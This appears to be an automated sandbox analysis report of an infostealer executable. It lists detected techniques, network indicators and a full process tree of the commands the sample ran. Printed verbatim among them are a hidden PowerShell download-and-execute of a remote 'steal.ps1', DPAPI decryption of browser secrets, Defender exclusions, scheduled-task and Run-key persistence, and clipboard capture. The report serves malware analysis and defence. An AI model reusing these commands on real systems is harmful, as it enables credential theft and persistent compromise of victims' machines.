19be7a745afa10fcc05ba050951318fb3d2da79f1b67c52926d88410464021df

Analysis

max time kernel
4s
max time network
9s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03/09/2024, 13:00

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

nkemchui.exe
Size

37.6MB
MD5

42709de634c80cb7d5ce1df21970ac8d
SHA1

09f4264988e6bc7472dd43b70d45b17d465c5e73
SHA256

19be7a745afa10fcc05ba050951318fb3d2da79f1b67c52926d88410464021df
SHA512

eaf1332b6bbc1b646d7695aa6460b2e39e200aa19fceef5b0129a0e8433311587261121976461655da6f3623a445fe4556a20938c948726b4525bce5cd0c5c41
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mge96l+ZArYsFRlCPm:R3on1HvSzxAMNeFZArYsqPvE7OZgKMH

Score

9^/10

collection credential_access defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	4764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4764	powershell.exe
212	powershell.exe
3740	powershell.exe
3456	powershell.exe
4052	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	nkemchui.exe

Clipboard Data 1 TTPs 1 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2616	cmd.exe

Loads dropped DLL 1 IoCs

pid	Process
1748	nkemchui.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2616	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
16	raw.githubusercontent.com
17	raw.githubusercontent.com
20	discord.com
13	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
5092	cmd.exe
4052	cmd.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4756	tasklist.exe
3024	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5052	WMIC.exe
4584	WMIC.exe
3272	WMIC.exe
3956	WMIC.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2760	reg.exe
3672	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3740	powershell.exe
3740	powershell.exe
4764	powershell.exe
4764	powershell.exe
2704	powershell.exe
2704	powershell.exe
4364	powershell.exe
4364	powershell.exe
212	powershell.exe
212	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	4756	tasklist.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	3024	tasklist.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeIncreaseQuotaPrivilege	1448	WMIC.exe
Token: SeSecurityPrivilege	1448	WMIC.exe
Token: SeTakeOwnershipPrivilege	1448	WMIC.exe
Token: SeLoadDriverPrivilege	1448	WMIC.exe
Token: SeSystemProfilePrivilege	1448	WMIC.exe
Token: SeSystemtimePrivilege	1448	WMIC.exe
Token: SeProfSingleProcessPrivilege	1448	WMIC.exe
Token: SeIncBasePriorityPrivilege	1448	WMIC.exe
Token: SeCreatePagefilePrivilege	1448	WMIC.exe
Token: SeBackupPrivilege	1448	WMIC.exe
Token: SeRestorePrivilege	1448	WMIC.exe
Token: SeShutdownPrivilege	1448	WMIC.exe
Token: SeDebugPrivilege	1448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1448	WMIC.exe
Token: SeRemoteShutdownPrivilege	1448	WMIC.exe
Token: SeUndockPrivilege	1448	WMIC.exe
Token: SeManageVolumePrivilege	1448	WMIC.exe
Token: 33	1448	WMIC.exe
Token: 34	1448	WMIC.exe
Token: 35	1448	WMIC.exe
Token: 36	1448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2480	WMIC.exe
Token: SeSecurityPrivilege	2480	WMIC.exe
Token: SeTakeOwnershipPrivilege	2480	WMIC.exe
Token: SeLoadDriverPrivilege	2480	WMIC.exe
Token: SeSystemProfilePrivilege	2480	WMIC.exe
Token: SeSystemtimePrivilege	2480	WMIC.exe
Token: SeProfSingleProcessPrivilege	2480	WMIC.exe
Token: SeIncBasePriorityPrivilege	2480	WMIC.exe
Token: SeCreatePagefilePrivilege	2480	WMIC.exe
Token: SeBackupPrivilege	2480	WMIC.exe
Token: SeRestorePrivilege	2480	WMIC.exe
Token: SeShutdownPrivilege	2480	WMIC.exe
Token: SeDebugPrivilege	2480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2480	WMIC.exe
Token: SeRemoteShutdownPrivilege	2480	WMIC.exe
Token: SeUndockPrivilege	2480	WMIC.exe
Token: SeManageVolumePrivilege	2480	WMIC.exe
Token: 33	2480	WMIC.exe
Token: 34	2480	WMIC.exe
Token: 35	2480	WMIC.exe
Token: 36	2480	WMIC.exe
Token: SeDebugPrivilege	212	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	WMIC.exe
Token: SeSecurityPrivilege	2480	WMIC.exe
Token: SeTakeOwnershipPrivilege	2480	WMIC.exe
Token: SeLoadDriverPrivilege	2480	WMIC.exe
Token: SeSystemProfilePrivilege	2480	WMIC.exe
Token: SeSystemtimePrivilege	2480	WMIC.exe
Token: SeProfSingleProcessPrivilege	2480	WMIC.exe
Token: SeIncBasePriorityPrivilege	2480	WMIC.exe
Token: SeCreatePagefilePrivilege	2480	WMIC.exe
Token: SeBackupPrivilege	2480	WMIC.exe
Token: SeRestorePrivilege	2480	WMIC.exe
Token: SeShutdownPrivilege	2480	WMIC.exe
Token: SeDebugPrivilege	2480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2480	WMIC.exe
Token: SeRemoteShutdownPrivilege	2480	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1748 wrote to memory of 1948	1748	nkemchui.exe	87
PID 1748 wrote to memory of 1948	1748	nkemchui.exe	87
PID 1948 wrote to memory of 4944	1948	cmd.exe	88
PID 1948 wrote to memory of 4944	1948	cmd.exe	88
PID 1948 wrote to memory of 3740	1948	cmd.exe	89
PID 1948 wrote to memory of 3740	1948	cmd.exe	89
PID 3740 wrote to memory of 572	3740	powershell.exe	90
PID 3740 wrote to memory of 572	3740	powershell.exe	90
PID 572 wrote to memory of 1204	572	csc.exe	91
PID 572 wrote to memory of 1204	572	csc.exe	91
PID 1748 wrote to memory of 3236	1748	nkemchui.exe	92
PID 1748 wrote to memory of 3236	1748	nkemchui.exe	92
PID 3236 wrote to memory of 2992	3236	cmd.exe	93
PID 3236 wrote to memory of 2992	3236	cmd.exe	93
PID 1748 wrote to memory of 4436	1748	nkemchui.exe	94
PID 1748 wrote to memory of 4436	1748	nkemchui.exe	94
PID 1748 wrote to memory of 4868	1748	nkemchui.exe	95
PID 1748 wrote to memory of 4868	1748	nkemchui.exe	95
PID 4868 wrote to memory of 4756	4868	cmd.exe	96
PID 4868 wrote to memory of 4756	4868	cmd.exe	96
PID 4436 wrote to memory of 4764	4436	cmd.exe	97
PID 4436 wrote to memory of 4764	4436	cmd.exe	97
PID 1748 wrote to memory of 448	1748	nkemchui.exe	99
PID 1748 wrote to memory of 448	1748	nkemchui.exe	99
PID 1748 wrote to memory of 5092	1748	nkemchui.exe	100
PID 1748 wrote to memory of 5092	1748	nkemchui.exe	100
PID 5092 wrote to memory of 2704	5092	cmd.exe	101
PID 5092 wrote to memory of 2704	5092	cmd.exe	101
PID 448 wrote to memory of 3024	448	cmd.exe	102
PID 448 wrote to memory of 3024	448	cmd.exe	102
PID 1748 wrote to memory of 4052	1748	nkemchui.exe	140
PID 1748 wrote to memory of 4052	1748	nkemchui.exe	140
PID 4052 wrote to memory of 4364	4052	cmd.exe	104
PID 4052 wrote to memory of 4364	4052	cmd.exe	104
PID 1748 wrote to memory of 3732	1748	nkemchui.exe	148
PID 1748 wrote to memory of 3732	1748	nkemchui.exe	148
PID 1748 wrote to memory of 1356	1748	nkemchui.exe	106
PID 1748 wrote to memory of 1356	1748	nkemchui.exe	106
PID 1748 wrote to memory of 2412	1748	nkemchui.exe	107
PID 1748 wrote to memory of 2412	1748	nkemchui.exe	107
PID 1748 wrote to memory of 2616	1748	nkemchui.exe	109
PID 1748 wrote to memory of 2616	1748	nkemchui.exe	109
PID 1356 wrote to memory of 4560	1356	cmd.exe	108
PID 1356 wrote to memory of 4560	1356	cmd.exe	108
PID 3732 wrote to memory of 1448	3732	cmd.exe	110
PID 3732 wrote to memory of 1448	3732	cmd.exe	110
PID 2412 wrote to memory of 3804	2412	cmd.exe	111
PID 2412 wrote to memory of 3804	2412	cmd.exe	111
PID 2616 wrote to memory of 212	2616	cmd.exe	112
PID 2616 wrote to memory of 212	2616	cmd.exe	112
PID 1748 wrote to memory of 3484	1748	nkemchui.exe	113
PID 1748 wrote to memory of 3484	1748	nkemchui.exe	113
PID 3484 wrote to memory of 2480	3484	cmd.exe	114
PID 3484 wrote to memory of 2480	3484	cmd.exe	114
PID 1748 wrote to memory of 4952	1748	nkemchui.exe	115
PID 1748 wrote to memory of 4952	1748	nkemchui.exe	115
PID 4952 wrote to memory of 4864	4952	cmd.exe	116
PID 4952 wrote to memory of 4864	4952	cmd.exe	116
PID 1748 wrote to memory of 3908	1748	nkemchui.exe	117
PID 1748 wrote to memory of 3908	1748	nkemchui.exe	117
PID 1748 wrote to memory of 1092	1748	nkemchui.exe	118
PID 1748 wrote to memory of 1092	1748	nkemchui.exe	118
PID 3908 wrote to memory of 3540	3908	cmd.exe	119
PID 3908 wrote to memory of 3540	3908	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\nkemchui.exe
"C:\Users\Admin\AppData\Local\Temp\nkemchui.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:4944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3740
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\men4rdw4\men4rdw4.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:572
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88C7.tmp" "c:\Users\Admin\AppData\Local\Temp\men4rdw4\CSC86C5AF8E9A4ACFB1D5F2F76E99F7AA.TMP"
        5⤵
        
        PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -nop -ep bypass -w hidden -c "iwr -useb https://raw.githubusercontent.com/s1uiasdad/log-acc-v2/main/scr/steal.ps1 | iex""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -nop -ep bypass -w hidden -c "iwr -useb https://raw.githubusercontent.com/s1uiasdad/log-acc-v2/main/scr/steal.ps1 | iex"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ddnfmvtm\ddnfmvtm.cmdline"
      4⤵
      PID:3620
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9376.tmp" "c:\Users\Admin\AppData\Local\Temp\ddnfmvtm\CSC4733441DF7A04E12B6D3D3F23657D912.TMP"
        5⤵
        
        PID:3512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:448
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,104,46,241,173,182,193,183,65,185,166,41,99,117,184,238,251,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,188,4,183,240,133,7,5,15,65,239,245,130,62,100,194,189,88,187,210,55,250,252,112,192,207,146,200,145,197,145,226,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,211,226,175,37,245,159,172,77,233,200,28,138,163,181,126,210,108,117,235,45,4,171,170,47,197,75,68,160,94,189,213,73,48,0,0,0,155,4,53,16,88,181,84,50,206,142,128,140,247,245,143,83,78,33,69,235,168,99,2,33,104,92,194,239,33,163,88,54,216,201,64,28,217,193,244,248,105,213,51,95,165,105,192,188,64,0,0,0,13,230,223,142,228,62,166,68,238,156,206,29,5,97,52,219,162,32,203,38,225,36,98,246,48,72,104,155,49,52,38,223,6,155,42,166,194,32,252,38,73,212,185,120,90,164,118,115,97,31,118,179,100,61,131,235,252,228,237,28,153,154,72,9), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,104,46,241,173,182,193,183,65,185,166,41,99,117,184,238,251,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,188,4,183,240,133,7,5,15,65,239,245,130,62,100,194,189,88,187,210,55,250,252,112,192,207,146,200,145,197,145,226,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,211,226,175,37,245,159,172,77,233,200,28,138,163,181,126,210,108,117,235,45,4,171,170,47,197,75,68,160,94,189,213,73,48,0,0,0,155,4,53,16,88,181,84,50,206,142,128,140,247,245,143,83,78,33,69,235,168,99,2,33,104,92,194,239,33,163,88,54,216,201,64,28,217,193,244,248,105,213,51,95,165,105,192,188,64,0,0,0,13,230,223,142,228,62,166,68,238,156,206,29,5,97,52,219,162,32,203,38,225,36,98,246,48,72,104,155,49,52,38,223,6,155,42,166,194,32,252,38,73,212,185,120,90,164,118,115,97,31,118,179,100,61,131,235,252,228,237,28,153,154,72,9), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,104,46,241,173,182,193,183,65,185,166,41,99,117,184,238,251,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,238,213,206,50,201,152,18,18,175,216,228,90,246,134,126,107,196,172,73,57,56,224,164,109,110,93,52,6,11,32,38,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,140,149,153,139,3,184,235,208,45,19,143,134,19,210,30,4,204,55,44,173,254,44,15,244,28,31,187,60,255,203,209,48,0,0,0,169,224,77,27,148,252,81,216,168,255,12,218,47,50,127,85,248,242,79,49,193,95,58,95,93,44,212,178,190,132,111,237,183,74,43,80,231,113,74,167,225,200,248,213,166,17,40,73,64,0,0,0,132,151,230,95,60,117,208,123,148,229,187,251,90,118,168,69,49,187,56,38,190,128,79,200,220,208,204,105,55,205,161,76,37,168,159,110,110,116,61,57,139,219,67,72,41,27,244,207,241,115,182,244,177,128,108,177,91,20,91,229,20,32,9,141), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,104,46,241,173,182,193,183,65,185,166,41,99,117,184,238,251,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,238,213,206,50,201,152,18,18,175,216,228,90,246,134,126,107,196,172,73,57,56,224,164,109,110,93,52,6,11,32,38,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,140,149,153,139,3,184,235,208,45,19,143,134,19,210,30,4,204,55,44,173,254,44,15,244,28,31,187,60,255,203,209,48,0,0,0,169,224,77,27,148,252,81,216,168,255,12,218,47,50,127,85,248,242,79,49,193,95,58,95,93,44,212,178,190,132,111,237,183,74,43,80,231,113,74,167,225,200,248,213,166,17,40,73,64,0,0,0,132,151,230,95,60,117,208,123,148,229,187,251,90,118,168,69,49,187,56,38,190,128,79,200,220,208,204,105,55,205,161,76,37,168,159,110,110,116,61,57,139,219,67,72,41,27,244,207,241,115,182,244,177,128,108,177,91,20,91,229,20,32,9,141), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Clipboard Data
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:212
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hmveusqr\hmveusqr.cmdline"
      4⤵
      PID:3268
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8FFB.tmp" "c:\Users\Admin\AppData\Local\Temp\hmveusqr\CSC2553C029687247C698AC1A95F64BD876.TMP"
        5⤵
        
        PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    PID:4864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:1648
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4052
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\nkemchui.exe" /f
        5⤵
        Modifies registry key
        
        PID:2760
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:3672
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3540
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:4520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:1096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:3380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4440
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:1696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:3580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:4472
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:4544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4296
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4584
- C:\Windows\system32\cmd.exe
